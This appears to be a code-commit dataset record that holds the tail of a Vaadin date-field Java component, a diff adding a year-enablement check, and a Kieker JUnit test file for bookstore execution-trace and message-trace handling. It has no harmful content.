DATE_CHANGE_METHOD); } public void removeDateChangeListener(DateChangeListener listener) { removeListener(DateChangeEvent.class, listener, DATE_CHANGE_METHOD); } public static final Method MONTH_CHANGE_METHOD = ReflectTools.findMethod(MonthChangeListener.class, "monthChange", MonthChangeEvent.class); public void addMonthChangeListener(MonthChangeListener listener) { addListener(MonthChangeEvent.class, listener, MONTH_CHANGE_METHOD); } public void removeMonthChangeListener(MonthChangeListener listener) { removeListener(MonthChangeEvent.class, listener, MONTH_CHANGE_METHOD); } public static final Method YEAR_CHANGE_METHOD = ReflectTools.findMethod(YearChangeListener.class, "yearChange", YearChangeEvent.class); public void addYearChangeListener(YearChangeListener listener) { addListener(YearChangeEvent.class, listener, YEAR_CHANGE_METHOD); } public void removeYearChangeListener(YearChangeListener listener) { removeListener(YearChangeEvent.class, listener, YEAR_CHANGE_METHOD); } @Override public Class<? extends String> getType() { return String.class; } /** * @return the monthDisplayed */ public YearMonth getYearMonthDisplayed() { return yearMonthDisplayed; } /** * @param yearMonthDisplayed * the yearMonthDisplayed to set */ public void setYearMonthDisplayed(YearMonth yearMonthDisplayed) { this.yearMonthDisplayed = yearMonthDisplayed; this.yearDisplayed = yearMonthDisplayed.getYear(); markAsDirty(); } /** * @return the yearDisplayed */ public Integer getYearDisplayed() { return yearDisplayed; } /** * @param yearDisplayed * the yearDisplayed to set */ public void setYearDisplayed(Integer yearDisplayed) { this.yearDisplayed = yearDisplayed; markAsDirty(); } /** * @return the dateTimeFormatter */ public DateTimeFormatter getDateTimeFormatter() { return dateTimeFormatter; } /** * @param dateTimeFormatter * the dateTimeFormatter to set */ public void setDateTimeFormatter(final DateTimeFormatter dateTimeFormatter) { this.dateTimeFormatter = dateTimeFormatter; defaultDateTimeFormatter = false; } /** * @return the weekendDisabled */ public boolean isWeekendDisabled() { return weekendDisabled; } /** * @param weekendDisabled * the weekendDisabled to set */ public void setWeekendDisabled(boolean weekendDisabled) { this.weekendDisabled = weekendDisabled; } /** * @return the calendarResolution */ public CalendarResolution getCalendarResolution() { return calendarResolution; } /** * @param calendarResolution * the calendarResolution to set */ public void setCalendarResolution(CalendarResolution calendarResolution) { this.calendarResolution = calendarResolution; } /** * @return the controlsEnabled */ public boolean isControlsEnabled() { return controlsEnabled; } /** * @param controlsEnabled * the controlsEnabled to set */ public void setControlsEnabled(boolean controlsEnabled) { this.controlsEnabled = controlsEnabled; } /** * @return the cellItemCustomizer */ public CellItemCustomizer getCellItemCustomizer() { return cellItemCustomizer; } /** * @param cellItemCustomizer * the cellItemCustomizer to set */ public void setCellItemCustomizer(CellItemCustomizer cellItemCustomizer) { this.cellItemCustomizer = cellItemCustomizer; } }
Added year enablement check
tuning-datefield/src/main/java/org/vaadin/addons/tuningdatefield/TuningDateField.java
Added year enablement check
<ide><path>uning-datefield/src/main/java/org/vaadin/addons/tuningdatefield/TuningDateField.java <ide> <ide> import java.lang.reflect.Method; <ide> import java.text.DateFormatSymbols; <del>import java.util.Arrays; <ide> import java.util.Calendar; <ide> import java.util.Locale; <ide> <ide> style.append("selected "); <ide> } <ide> <del> // FIXME missing isYearEnabled <add> if (isYearEnabled(year)) { <add> calendarItems[i].setEnabled(true); <add> } <ide> <ide> if (cellItemCustomizer != null) { <ide> String generatedStyle = cellItemCustomizer.getStyle(year, this); <ide> fireEvent(new MonthChangeEvent(this, selectedMonth)); <ide> } <ide> } else if (calendarResolution.equals(CalendarResolution.YEAR)) { <del> // FIXME : isYearEnabled <del> setYearMonthDisplayed(new YearMonth(relativeDateIndex, getYearMonthDisplayed().getMonthOfYear())); <del> setCalendarResolution(CalendarResolution.MONTH); <add> if(isYearEnabled(relativeDateIndex)) { <add> setYearMonthDisplayed(new YearMonth(relativeDateIndex, getYearMonthDisplayed().getMonthOfYear())); <add> setCalendarResolution(CalendarResolution.MONTH); <add> } <ide> } <ide> } <ide> <ide> } <ide> <ide> /** <del> * Returns true if month is enabled. Default implementations returns monthCustomizer value if any. <add> * Returns true if month is enabled. Default implementations returns {@link CellItemCustomizer} value if any. <ide> * <ide> * @param yearMonth <add> * the month <ide> * @return true if month is enabled. <ide> */ <ide> protected boolean isMonthEnabled(YearMonth yearMonth) { <ide> if (cellItemCustomizer != null) { <ide> return cellItemCustomizer.isEnabled(yearMonth, this); <add> } <add> return true; <add> } <add> <add> /** <add> * Returns true if year is enabled. Default implementations returns {@link CellItemCustomizer} value if any. <add> * <add> * @param year <add> * the year <add> * @return true if year is enabled. <add> */ <add> protected boolean isYearEnabled(int year) { <add> if (cellItemCustomizer != null) { <add> return cellItemCustomizer.isEnabled(year, this); <ide> } <ide> return true; <ide> }
Java
apache-2.0
c58d3b8967d5b86ca510de50114c8eb9c76dcde0
0
kieker-monitoring/kieker,HaStr/kieker,kieker-monitoring/kieker,leadwire-apm/leadwire-javaagent,HaStr/kieker,leadwire-apm/leadwire-javaagent,kieker-monitoring/kieker,HaStr/kieker,kieker-monitoring/kieker,HaStr/kieker,HaStr/kieker,kieker-monitoring/kieker
/*************************************************************************** * Copyright 2011 by * + Christian-Albrechts-University of Kiel * + Department of Computer Science * + Software Engineering Group * and others. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. ***************************************************************************/ package kieker.test.tools.junit.traceAnalysis.systemModel; import java.util.List; import java.util.SortedSet; import java.util.TreeSet; import junit.framework.Assert; import junit.framework.TestCase; import kieker.common.configuration.Configuration; import kieker.common.logging.Log; import kieker.common.logging.LogFactory; import kieker.test.tools.junit.traceAnalysis.util.ExecutionFactory; import kieker.tools.traceAnalysis.filter.traceReconstruction.InvalidTraceException; import kieker.tools.traceAnalysis.systemModel.AbstractMessage; import kieker.tools.traceAnalysis.systemModel.AllocationComponent; import kieker.tools.traceAnalysis.systemModel.Execution; import kieker.tools.traceAnalysis.systemModel.ExecutionTrace; import kieker.tools.traceAnalysis.systemModel.MessageTrace; import kieker.tools.traceAnalysis.systemModel.Operation; import kieker.tools.traceAnalysis.systemModel.SynchronousCallMessage; import kieker.tools.traceAnalysis.systemModel.SynchronousReplyMessage; import kieker.tools.traceAnalysis.systemModel.repository.SystemModelRepository; import org.junit.Before; import org.junit.Test; /** * * @author Andre van Hoorn */ public class TestExecutionTraceBookstore extends TestCase { private static final Log LOG = LogFactory.getLog(TestExecutionTraceBookstore.class); private static final long TRACE_ID = 69898L; private static final String SESSION_ID = "iXsnm70o4N"; private volatile ExecutionFactory eFactory; private volatile long minTin; private volatile long maxTout; private volatile int numExecutions; /* Executions of a valid trace */ private volatile Execution exec0_0__bookstore_searchBook; // NOCS // NOPMD (VariableNamingConventions) private volatile Execution exec1_1__catalog_getBook; // NOCS // NOPMD (VariableNamingConventions) private volatile Execution exec2_1__crm_getOrders; // NOCS // NOPMD (VariableNamingConventions) private volatile Execution exec3_2__catalog_getBook; // NOCS // NOPMD (VariableNamingConventions) // public TestExecutionTraceBookstore() { // // } @Override @Before protected void setUp() throws Exception { final SystemModelRepository systemEntityFactory = new SystemModelRepository(new Configuration()); this.eFactory = new ExecutionFactory(systemEntityFactory); int numExecutions_l = 0; /* Manually create Executions for a trace */ numExecutions_l++; this.exec0_0__bookstore_searchBook = this.eFactory.genExecution("Bookstore", "bookstore", "searchBook", TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID, 1, 10, 0, 0); this.minTin = this.exec0_0__bookstore_searchBook.getTin(); this.maxTout = this.exec0_0__bookstore_searchBook.getTout(); numExecutions_l++; this.exec1_1__catalog_getBook = this.eFactory.genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, // NOPMD TestExecutionTraceBookstore.SESSION_ID, 2, 4, 1, 1); numExecutions_l++; this.exec2_1__crm_getOrders = this.eFactory.genExecution("CRM", "crm", "getOrders", TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID, 5, 8, 2, 1); numExecutions_l++; this.exec3_2__catalog_getBook = this.eFactory.genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID, 6, 7, 3, 2); // Just some basic checks to make sure that the trace has been set up properly (we've had some trouble here) Assert.assertNotSame(this.exec3_2__catalog_getBook.getOperation(), this.exec2_1__crm_getOrders.getOperation()); Assert.assertNotSame(this.exec0_0__bookstore_searchBook.getAllocationComponent(), this.exec1_1__catalog_getBook.getAllocationComponent()); this.numExecutions = numExecutions_l; } private ExecutionTrace genValidBookstoreTrace() throws InvalidTraceException { /* * Create an Execution Trace and add Executions in * arbitrary order */ final ExecutionTrace executionTrace = new ExecutionTrace(TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID); executionTrace.add(this.exec3_2__catalog_getBook); executionTrace.add(this.exec2_1__crm_getOrders); executionTrace.add(this.exec0_0__bookstore_searchBook); executionTrace.add(this.exec1_1__catalog_getBook); return executionTrace; } /** * Tests whether the "well-known" Bookstore trace gets correctly * represented as an Execution Trace. * * @throws InvalidTraceException */ @Test public void testValidExecutionTrace() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genValidBookstoreTrace(); /* Perform some validity checks on the execution trace object */ Assert.assertEquals("Invalid length of Execution Trace", executionTrace.getLength(), this.numExecutions); Assert.assertEquals("Invalid maximum stack depth", executionTrace.getMaxEss(), 2); Assert.assertEquals("Invalid minimum tin timestamp", executionTrace.getMinTin(), this.minTin); Assert.assertEquals("Invalid maximum tout timestamp", executionTrace.getMaxTout(), this.maxTout); } /** * Tests the equals method of the ExecutionTrace class with two equal * traces. * * @throws InvalidTraceException */ @Test public void testEqualMethodEqualTraces() throws InvalidTraceException { final ExecutionTrace execTrace1 = this.genValidBookstoreTrace(); final ExecutionTrace execTrace2 = this.genValidBookstoreTrace(); Assert.assertEquals(execTrace1, execTrace2); } /** * Tests the equals method of the ExecutionTrace class with two different * traces. * * @throws InvalidTraceException */ @Test public void testEqualMethodDifferentTraces() throws InvalidTraceException { final ExecutionTrace execTrace1 = this.genValidBookstoreTrace(); final ExecutionTrace execTrace2 = this.genBrokenBookstoreTraceEoiSkip(); Assert.assertFalse(execTrace1.equals(execTrace2)); } private enum VariationPoint { OPERATION, ALLOCATION, TRACE_ID, SESSION_ID, EOI, ESS, TIN, TOUT }; /** * Returns an {@link Execution} with each field being equal to that of <i>executionTemplate</i> except for the value * of the given {@link VariationPoint} being set to the respective value of <i>variationTemplate</i>. * * @param executionTemplate * @param vPoint * @param variationTemplate * @return */ private Execution cloneExecutionWithVariation(final Execution executionTemplate, final VariationPoint vPoint, final Execution variationTemplate) { Operation op = executionTemplate.getOperation(); AllocationComponent allocComp = executionTemplate.getAllocationComponent(); long traceId = executionTemplate.getTraceId(); String sessionId = executionTemplate.getSessionId(); int eoi = executionTemplate.getEoi(); int ess = executionTemplate.getEss(); long tin = executionTemplate.getTin(); long tout = executionTemplate.getTout(); final boolean assumed = executionTemplate.isAssumed(); /* Now perform the selected variation */ switch (vPoint) { case ALLOCATION: allocComp = variationTemplate.getAllocationComponent(); break; case EOI: eoi = variationTemplate.getEoi(); break; case ESS: ess = variationTemplate.getEss(); break; case OPERATION: op = variationTemplate.getOperation(); break; case SESSION_ID: sessionId = variationTemplate.getSessionId(); break; case TIN: tin = variationTemplate.getTin(); break; case TOUT: tout = variationTemplate.getTout(); break; case TRACE_ID: traceId = variationTemplate.getTraceId(); break; default: Assert.fail(); } final Execution retVal = new Execution(op, allocComp, traceId, sessionId, eoi, ess, tin, tout, assumed); Assert.assertFalse("executions must vary in " + vPoint + " but are equal: " + executionTemplate + " ; " + retVal, retVal.equals(executionTemplate)); return retVal; } @Test public void testExecutionTraceEqualMethod() throws InvalidTraceException { final ExecutionTrace trace0 = this.genValidBookstoreTrace(); /** * Will be used to create a clone of exec0_0__bookstore_searchBook with certain variations * selected from the execution. */ final Execution variationTemplate = new Execution(this.exec1_1__catalog_getBook.getOperation(), this.exec1_1__catalog_getBook.getAllocationComponent(), this.exec1_1__catalog_getBook.getTraceId() + 100, this.exec1_1__catalog_getBook.getSessionId() + "_", this.exec1_1__catalog_getBook.getEoi() + 100, this.exec1_1__catalog_getBook.getEss() + 100, this.exec1_1__catalog_getBook.getTin() + 100, this.exec1_1__catalog_getBook.getTout(), !this.exec1_1__catalog_getBook.isAssumed()); vLoop: for (final VariationPoint vPoint : VariationPoint.values()) { final ExecutionTrace trace1 = new ExecutionTrace(trace0.getTraceId(), trace0.getSessionId()); for (final Execution execFromTrace0 : trace0.getTraceAsSortedExecutionSet()) { final Execution execToAddToTrace1; if (execFromTrace0 == this.exec0_0__bookstore_searchBook) { execToAddToTrace1 = this.cloneExecutionWithVariation(this.exec0_0__bookstore_searchBook, vPoint, variationTemplate); // This tests the Execution's equals method already Assert.assertFalse("Executions must not be equal (variation point: " + vPoint + " ) but they are: " + execFromTrace0 + "; " + execToAddToTrace1, execFromTrace0.equals(execToAddToTrace1)); if (vPoint == VariationPoint.TRACE_ID) { // We won't be able to continue for this variation because we cannot add an execution // with a varying trace id. However, at least we've tested the Execution's equal method. continue vLoop; } } else { execToAddToTrace1 = execFromTrace0; } trace1.add(execToAddToTrace1); } Assert.assertFalse("Execution traces must not be equal (variation point: " + vPoint + " ) but they are: " + trace0 + "; " + trace1, trace0.equals(trace1)); } } /** * This method can be used to debug the {@link java.util.Comparator} provided by {@link ExecutionTrace#createExecutionTraceComparator()}. */ @Test public void testTreeSet() { final SortedSet<Execution> s0 = new TreeSet<Execution>(ExecutionTrace.createExecutionTraceComparator()); final SortedSet<Execution> s1 = new TreeSet<Execution>(ExecutionTrace.createExecutionTraceComparator()); final Execution execFromTrace0 = this.exec0_0__bookstore_searchBook; final Execution long1 = new Execution(execFromTrace0.getOperation(), execFromTrace0.getAllocationComponent(), execFromTrace0.getTraceId(), execFromTrace0.getSessionId(), execFromTrace0.getEoi(), execFromTrace0.getEss(), execFromTrace0.getTin(), execFromTrace0.getTout(), execFromTrace0.isAssumed()); s0.add(execFromTrace0); s1.add(long1); Assert.assertEquals("Expected sets to be equal", s0, s1); } /** * Tests whether the "well-known" Bookstore trace can be correctly transformed * from an Execution Trace representation into a Message Trace representation. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationValidTrace() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genValidBookstoreTrace(); /* * Transform Execution Trace to Message Trace representation */ final MessageTrace messageTrace = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); /* * Validate Message Trace representation. */ Assert.assertEquals("Invalid traceId", messageTrace.getTraceId(), TestExecutionTraceBookstore.TRACE_ID); final List<AbstractMessage> msgVector = messageTrace.getSequenceAsVector(); Assert.assertEquals("Invalid number of messages in trace", msgVector.size(), this.numExecutions * 2); final AbstractMessage[] msgArray = msgVector.toArray(new AbstractMessage[msgVector.size()]); Assert.assertEquals(msgArray.length, this.numExecutions * 2); int curIdx = 0; { /* 1.: [0,0].Call $->bookstore.searchBook(..) */// NOCS final AbstractMessage call0_0___root__bookstore_searchBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a call", call0_0___root__bookstore_searchBook instanceof SynchronousCallMessage); // NOPMD (String repeat) Assert.assertEquals("Sending execution is not root execution", call0_0___root__bookstore_searchBook.getSendingExecution(), SystemModelRepository.ROOT_EXECUTION); Assert.assertEquals(call0_0___root__bookstore_searchBook.getReceivingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals("Message has wrong timestamp", call0_0___root__bookstore_searchBook.getTimestamp(), this.exec0_0__bookstore_searchBook.getTin()); // NOPMD } { /* 2.: [1,1].Call bookstore.searchBook(..)->catalog.getBook(..) */// NOCS final AbstractMessage call1_1___bookstore_searchBook_catalog_getBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a call", call1_1___bookstore_searchBook_catalog_getBook instanceof SynchronousCallMessage); Assert.assertEquals(call1_1___bookstore_searchBook_catalog_getBook.getSendingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals(call1_1___bookstore_searchBook_catalog_getBook.getReceivingExecution(), this.exec1_1__catalog_getBook); Assert.assertEquals("Message has wrong timestamp", call1_1___bookstore_searchBook_catalog_getBook.getTimestamp(), this.exec1_1__catalog_getBook.getTin()); } { /* 2.: [1,1].Return catalog.getBook(..)->bookstore.searchBook(..) */// NOCS final AbstractMessage return1_1___catalog_getBook__bookstore_searchBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a reply", return1_1___catalog_getBook__bookstore_searchBook instanceof SynchronousReplyMessage); Assert.assertEquals(return1_1___catalog_getBook__bookstore_searchBook.getSendingExecution(), this.exec1_1__catalog_getBook); Assert.assertEquals(return1_1___catalog_getBook__bookstore_searchBook.getReceivingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals("Message has wrong timestamp", return1_1___catalog_getBook__bookstore_searchBook.getTimestamp(), this.exec1_1__catalog_getBook.getTout()); } { /* 3.: [2,1].Call bookstore.searchBook(..)->crm.getOrders(..) */// NOCS final AbstractMessage call2_1___bookstore_searchBook__crm_getOrders = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a call", call2_1___bookstore_searchBook__crm_getOrders instanceof SynchronousCallMessage); Assert.assertEquals(call2_1___bookstore_searchBook__crm_getOrders.getSendingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals(call2_1___bookstore_searchBook__crm_getOrders.getReceivingExecution(), this.exec2_1__crm_getOrders); Assert.assertEquals("Message has wrong timestamp", call2_1___bookstore_searchBook__crm_getOrders.getTimestamp(), this.exec2_1__crm_getOrders.getTin()); } { /* 4.: [3,2].Call crm.getOrders(..)->catalog.getBook(..) */// NOCS final AbstractMessage call3_2___bookstore_searchBook__catalog_getBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a call", call3_2___bookstore_searchBook__catalog_getBook instanceof SynchronousCallMessage); Assert.assertEquals(call3_2___bookstore_searchBook__catalog_getBook.getSendingExecution(), this.exec2_1__crm_getOrders); Assert.assertEquals(call3_2___bookstore_searchBook__catalog_getBook.getReceivingExecution(), this.exec3_2__catalog_getBook); Assert.assertEquals("Message has wrong timestamp", call3_2___bookstore_searchBook__catalog_getBook.getTimestamp(), this.exec3_2__catalog_getBook.getTin()); } { /* 5.: [3,2].Return catalog.getBook(..)->crm.getOrders(..) */// NOCS final AbstractMessage return3_2___catalog_getBook__crm_getOrders = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a reply", return3_2___catalog_getBook__crm_getOrders instanceof SynchronousReplyMessage); Assert.assertEquals(return3_2___catalog_getBook__crm_getOrders.getSendingExecution(), this.exec3_2__catalog_getBook); Assert.assertEquals(return3_2___catalog_getBook__crm_getOrders.getReceivingExecution(), this.exec2_1__crm_getOrders); Assert.assertEquals("Message has wrong timestamp", return3_2___catalog_getBook__crm_getOrders.getTimestamp(), this.exec3_2__catalog_getBook.getTout()); } { /* 6.: [2,1].Return crm.getOrders(..)->bookstore.searchBook */// NOCS final AbstractMessage return2_1___crm_getOrders__bookstore_searchBook = msgArray[curIdx++]; // NOCS Assert.assertTrue("Message is not a reply", return2_1___crm_getOrders__bookstore_searchBook instanceof SynchronousReplyMessage); Assert.assertEquals(return2_1___crm_getOrders__bookstore_searchBook.getSendingExecution(), this.exec2_1__crm_getOrders); Assert.assertEquals(return2_1___crm_getOrders__bookstore_searchBook.getReceivingExecution(), this.exec0_0__bookstore_searchBook); Assert.assertEquals("Message has wrong timestamp", return2_1___crm_getOrders__bookstore_searchBook.getTimestamp(), this.exec2_1__crm_getOrders.getTout()); } } /** * Make sure that the transformation from an Execution Trace to a Message * Trace is performed only once. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationOnlyOnce() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genValidBookstoreTrace(); /* * Transform Execution Trace to Message Trace representation (twice) * and make sure, that the instances are the same. */ final MessageTrace messageTrace1 = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); final MessageTrace messageTrace2 = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); Assert.assertSame(messageTrace1, messageTrace2); } /** * Make sure that the transformation from an Execution Trace to a Message * Trace is performed only once. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationTwiceOnChange() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genValidBookstoreTrace(); final Execution exec4_1__catalog_getBook = this.eFactory // NOCS .genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID, 9, 10, 4, 1); final MessageTrace messageTrace1 = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); executionTrace.add(exec4_1__catalog_getBook); final MessageTrace messageTrace2 = executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); Assert.assertNotSame(messageTrace1, messageTrace2); } /** * Creates a broken execution trace version of the "well-known" Bookstore * trace leads to an exception. * * The trace is broken in that the eoi/ess values of an execution with eoi/ess * [1,1] are replaced by the eoi/ess values [1,3]. Since ess values must only * increment/decrement by 1, this test must lead to an exception. * * @return * @throws InvalidTraceException */ private ExecutionTrace genBrokenBookstoreTraceEssSkip() throws InvalidTraceException { /* * Create an Execution Trace and add Executions in * arbitrary order */ final ExecutionTrace executionTrace = new ExecutionTrace(TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID); final Execution exec1_1__catalog_getBook__broken = this.eFactory.genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, // NOCS TestExecutionTraceBookstore.SESSION_ID, 2, 4, 1, 3); // NOCS Assert.assertFalse("Invalid test", exec1_1__catalog_getBook__broken.equals(this.exec1_1__catalog_getBook)); executionTrace.add(this.exec3_2__catalog_getBook); executionTrace.add(this.exec2_1__crm_getOrders); executionTrace.add(this.exec0_0__bookstore_searchBook); executionTrace.add(exec1_1__catalog_getBook__broken); return executionTrace; } /** * Assert that the transformation of a broken execution trace version of the * "well-known" Bookstore trace leads to an exception. * * The trace is broken in that the eoi/ess values of an execution with eoi/ess * [1,1] are replaced by the eoi/ess values [1,3]. Since ess values must only * increment/decrement by 1, this test must lead to an exception. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationBrokenTraceEssSkip() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genBrokenBookstoreTraceEssSkip(); /** * Transform Execution Trace to Message Trace representation */ try { /* The following call must throw an Exception in this test case */ TestExecutionTraceBookstore.LOG.info("This test triggers a FATAL warning about an ess skip <0,3> which can simply be ignored because it is desired"); executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); Assert.fail("An invalid execution has been transformed to a message trace"); } catch (final InvalidTraceException ex) { // NOPMD /* we wanted this exception to happen */ } } /** * Creates a broken execution trace version of the "well-known" Bookstore * trace leads to an exception. * * The trace is broken in that the eoi/ess values of an execution with eoi/ess * [3,2] are replaced by the eoi/ess values [4,2]. Since eoi values must only * increment by 1, this test must lead to an exception. * * @return * @throws InvalidTraceException */ private ExecutionTrace genBrokenBookstoreTraceEoiSkip() throws InvalidTraceException { /* * Create an Execution Trace and add Executions in * arbitrary order */ final ExecutionTrace executionTrace = new ExecutionTrace(TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID); final Execution exec3_2__catalog_getBook__broken = this.eFactory.genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, // NOCS TestExecutionTraceBookstore.SESSION_ID, 6, 7, 4, 2); Assert.assertFalse("Invalid test", exec3_2__catalog_getBook__broken.equals(this.exec3_2__catalog_getBook)); executionTrace.add(exec3_2__catalog_getBook__broken); executionTrace.add(this.exec2_1__crm_getOrders); executionTrace.add(this.exec0_0__bookstore_searchBook); executionTrace.add(this.exec1_1__catalog_getBook); return executionTrace; } /** * Assert that the transformation of a broken execution trace version of the * "well-known" Bookstore trace leads to an exception. * * The trace is broken in that the eoi/ess values of an execution with eoi/ess * [3,2] are replaced by the eoi/ess values [4,2]. Since eoi values must only * increment by 1, this test must lead to an exception. * * @throws InvalidTraceException */ @Test public void testMessageTraceTransformationBrokenTraceEoiSkip() throws InvalidTraceException { /* * Create an Execution Trace and add Executions in * arbitrary order */ final ExecutionTrace executionTrace = this.genBrokenBookstoreTraceEoiSkip(); /** * Transform Execution Trace to Message Trace representation */ try { /* The following call must throw an Exception in this test case */ executionTrace.toMessageTrace(SystemModelRepository.ROOT_EXECUTION); Assert.fail("An invalid execution has been transformed to a message trace"); } catch (final InvalidTraceException ex) { // NOPMD /* we wanted this exception to happen */ } } }
test/tools/kieker/test/tools/junit/traceAnalysis/systemModel/TestExecutionTraceBookstore.java
/*************************************************************************** * Copyright 2011 by * + Christian-Albrechts-University of Kiel * + Department of Computer Science * + Software Engineering Group * and others. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. ***************************************************************************/ package kieker.test.tools.junit.traceAnalysis.systemModel; import java.util.List; import java.util.SortedSet; import java.util.TreeSet; import junit.framework.Assert; import junit.framework.TestCase; import kieker.common.configuration.Configuration; import kieker.common.logging.Log; import kieker.common.logging.LogFactory; import kieker.test.tools.junit.traceAnalysis.util.ExecutionFactory; import kieker.tools.traceAnalysis.filter.traceReconstruction.InvalidTraceException; import kieker.tools.traceAnalysis.systemModel.AbstractMessage; import kieker.tools.traceAnalysis.systemModel.AllocationComponent; import kieker.tools.traceAnalysis.systemModel.Execution; import kieker.tools.traceAnalysis.systemModel.ExecutionTrace; import kieker.tools.traceAnalysis.systemModel.MessageTrace; import kieker.tools.traceAnalysis.systemModel.Operation; import kieker.tools.traceAnalysis.systemModel.SynchronousCallMessage; import kieker.tools.traceAnalysis.systemModel.SynchronousReplyMessage; import kieker.tools.traceAnalysis.systemModel.repository.SystemModelRepository; import org.junit.Before; import org.junit.Test; /** * * @author Andre van Hoorn */ public class TestExecutionTraceBookstore extends TestCase { private static final Log LOG = LogFactory.getLog(TestExecutionTraceBookstore.class); private static final long TRACE_ID = 69898L; private static final String SESSION_ID = "iXsnm70o4N"; private volatile ExecutionFactory eFactory; private volatile long minTin; private volatile long maxTout; private volatile int numExecutions; /* Executions of a valid trace */ private volatile Execution exec0_0__bookstore_searchBook; // NOCS // NOMPD (VariableNamingConventions) private volatile Execution exec1_1__catalog_getBook; // NOCS // NOMPD (VariableNamingConventions) private volatile Execution exec2_1__crm_getOrders; // NOCS // NOMPD (VariableNamingConventions) private volatile Execution exec3_2__catalog_getBook; // NOCS // NOMPD (VariableNamingConventions) // public TestExecutionTraceBookstore() { // // } @Override @Before protected void setUp() throws Exception { final SystemModelRepository systemEntityFactory = new SystemModelRepository(new Configuration()); this.eFactory = new ExecutionFactory(systemEntityFactory); int numExecutions_l = 0; /* Manually create Executions for a trace */ numExecutions_l++; this.exec0_0__bookstore_searchBook = this.eFactory.genExecution("Bookstore", "bookstore", "searchBook", TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID, 1, 10, 0, 0); this.minTin = this.exec0_0__bookstore_searchBook.getTin(); this.maxTout = this.exec0_0__bookstore_searchBook.getTout(); numExecutions_l++; this.exec1_1__catalog_getBook = this.eFactory.genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, // NOPMD TestExecutionTraceBookstore.SESSION_ID, 2, 4, 1, 1); numExecutions_l++; this.exec2_1__crm_getOrders = this.eFactory.genExecution("CRM", "crm", "getOrders", TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID, 5, 8, 2, 1); numExecutions_l++; this.exec3_2__catalog_getBook = this.eFactory.genExecution("Catalog", "catalog", "getBook", TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID, 6, 7, 3, 2); // Just some basic checks to make sure that the trace has been set up properly (we've had some trouble here) Assert.assertNotSame(this.exec3_2__catalog_getBook.getOperation(), this.exec2_1__crm_getOrders.getOperation()); Assert.assertNotSame(this.exec0_0__bookstore_searchBook.getAllocationComponent(), this.exec1_1__catalog_getBook.getAllocationComponent()); this.numExecutions = numExecutions_l; } private ExecutionTrace genValidBookstoreTrace() throws InvalidTraceException { /* * Create an Execution Trace and add Executions in * arbitrary order */ final ExecutionTrace executionTrace = new ExecutionTrace(TestExecutionTraceBookstore.TRACE_ID, TestExecutionTraceBookstore.SESSION_ID); executionTrace.add(this.exec3_2__catalog_getBook); executionTrace.add(this.exec2_1__crm_getOrders); executionTrace.add(this.exec0_0__bookstore_searchBook); executionTrace.add(this.exec1_1__catalog_getBook); return executionTrace; } /** * Tests whether the "well-known" Bookstore trace gets correctly * represented as an Execution Trace. * * @throws InvalidTraceException */ @Test public void testValidExecutionTrace() throws InvalidTraceException { final ExecutionTrace executionTrace = this.genValidBookstoreTrace(); /* Perform some validity checks on the execution trace object */ Assert.assertEquals("Invalid length of Execution Trace", executionTrace.getLength(), this.numExecutions); Assert.assertEquals("Invalid maximum stack depth", executionTrace.getMaxEss(), 2); Assert.assertEquals("Invalid minimum tin timestamp", executionTrace.getMinTin(), this.minTin); Assert.assertEquals("Invalid maximum tout timestamp", executionTrace.getMaxTout(), this.maxTout); } /** * Tests the equals method of the 